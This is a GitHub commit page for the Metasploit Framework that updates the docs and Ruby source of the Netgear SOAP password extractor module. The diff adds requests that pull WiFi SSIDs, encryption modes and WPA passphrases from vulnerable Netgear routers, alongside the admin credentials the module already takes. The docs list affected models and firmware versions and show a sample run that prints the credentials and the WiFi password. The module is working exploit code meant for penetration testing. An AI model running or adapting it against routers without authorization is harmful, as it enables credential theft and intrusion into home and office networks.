Skip to content

Commit 9862a2f

Browse files
tdoan-r7tdoan-r7
committed
Land rapid7#7080, Updated docs and made enhancements for Netgear soap password extractor
2 parents 78bfced + fdce5bc commit 9862a2f

File tree

2 files changed

+47
-20
lines changed

2 files changed

+47
-20
lines changed

documentation/modules/auxiliary/admin/http/netgear_soap_password_extractor.md

Lines changed: 18 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -1,21 +1,17 @@
11
## Vulnerable Application
22

33
The following list is a non-exhaustive list of vulnerable Netgear devices:
4-
1. R6300v2 - V1.0.3.8
5-
2. WNDR3300 - V1.0.45
6-
3. WNDR3700v1 - V1.0.7.98
7-
4. WNDR3700v1 - V1.0.16.98
8-
5. WNDR3700v2 - V1.0.1.14
9-
6. WNDR3700v4 - V1.0.1.42
10-
7. WNDR3700v4 - V1.0.0.4SH
11-
8. WNDR3700v4 - V1.0.1.52
12-
9. WNDR3800 - V1.0.0.48
13-
10. WNDR4300 - V1.0.1.60
14-
11. WNR1000v2 - V1.0.1.1
15-
12. WNR1000v2 - V1.1.2.58
16-
13. WNR2000v3 - v1.1.2.10
17-
14. WNR2200 - V1.0.1.88
18-
15. WNR2500 - V1.0.0.24
4+
1. R6300v2 < [1.0.3.28](http://kb.netgear.com/app/answers/detail/a_id/28372)
5+
2. WNDR3300 - V1.0.45 (current, confirmed vuln)
6+
3. WNDR3700v1 - 1.0.7.98, 1.0.16.98 (confirmed vuln)
7+
4. WNDR3700v2 - 1.0.1.14 (EOL, confirmed vuln)
8+
5. WNDR3700v4 < [1.0.2.80](http://kb.netgear.com/app/answers/detail/a_id/28355)
9+
6. WNDR3800 - 1.0.0.48 (EOL, confirmed vuln)
10+
7. WNDR4300 < [1.0.2.80](http://kb.netgear.com/app/answers/detail/a_id/28037)
11+
8. WNR1000v2 - 1.0.1.1, 1.1.2.58 (EOL, confirmed vuln)
12+
9. WNR2000v3 < [1.1.2.12](http://kb.netgear.com/app/answers/detail/a_id/30024)
13+
10. WNR2200 < [1.0.1.96](http://kb.netgear.com/app/answers/detail/a_id/28036)
14+
11. WNR2500 < [1.0.0.32](http://kb.netgear.com/app/answers/detail/a_id/28351)
1915

2016
## Verification Steps
2117

@@ -39,11 +35,15 @@ msf auxiliary(netgear_soap_password_extractor) > run
3935
[*] Extracting Firmware version...
4036
[+] Model wnr2000v3 found
4137
[+] Firmware version V1.1.2.10 found
42-
[+] Device details downloaded to: /root/.msf4/loot/20160701181449_default_192.168.1.1_netgear_soap_dev_668524.txt
38+
[+] Device details downloaded to: /root/.msf4/loot/20160706212637_default_192.168.1.1_netgear_soap_dev_000157.txt
4339
[*] Extracting credentials...
4440
[*] Credentials found, extracting...
4541
[+] admin / password credentials found
46-
[+] Account details downloaded to: /root/.msf4/loot/20160701181449_default_192.168.1.1_netgear_soap_acc_252579.txt
42+
[+] Account details downloaded to: /root/.msf4/loot/20160706212637_default_192.168.1.1_netgear_soap_acc_387111.txt
43+
[*] Extracting Wifi...
44+
[+] Wifi SSID: NETGEAR44
45+
[+] Wifi Encryption: WPA2-PSK
46+
[*] Extracting WPA Keys...
47+
[+] Wifi Password: netgearpassword22
4748
[*] Auxiliary module execution completed
48-
4949
```

modules/auxiliary/admin/http/netgear_soap_password_extractor.rb

Lines changed: 29 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -37,9 +37,11 @@ def initialize
3737
'Author' =>
3838
[
3939
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery
40-
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
40+
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
41+
'h00die <[email protected]>' # Metasploit enhancements/docs
4142
],
42-
'License' => MSF_LICENSE
43+
'License' => MSF_LICENSE,
44+
'DisclosureDate' => 'Feb 11 2015'
4345
)
4446
end
4547

@@ -55,6 +57,16 @@ def run
5557
action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo'
5658
print_status("Extracting credentials...")
5759
extract_data(action)
60+
61+
# extract wifi info
62+
action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo'
63+
print_status("Extracting Wifi...")
64+
extract_data(action)
65+
66+
# extract WPA info
67+
action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys'
68+
print_status("Extracting WPA Keys...")
69+
extract_data(action)
5870
end
5971

6072
def extract_data(soap_action)
@@ -93,6 +105,21 @@ def extract_data(soap_action)
93105
print_good("Device details downloaded to: #{loot}")
94106
end
95107

108+
if res.body =~ /<NewSSID>(.*)<\/NewSSID>/
109+
ssid = $1
110+
print_good("Wifi SSID: #{ssid}")
111+
end
112+
113+
if res.body =~ /<NewBasicEncryptionModes>(.*)<\/NewBasicEncryptionModes>/
114+
wifi_encryption = $1
115+
print_good("Wifi Encryption: #{wifi_encryption}")
116+
end
117+
118+
if res.body =~ /<NewWPAPassphrase>(.*)<\/NewWPAPassphrase>/
119+
wifi_password = $1
120+
print_good("Wifi Password: #{wifi_password}")
121+
end
122+
96123
rescue ::Rex::ConnectionError
97124
vprint_error("Failed to connect to the web server")
98125
return

0 commit comments

Comments
 (0)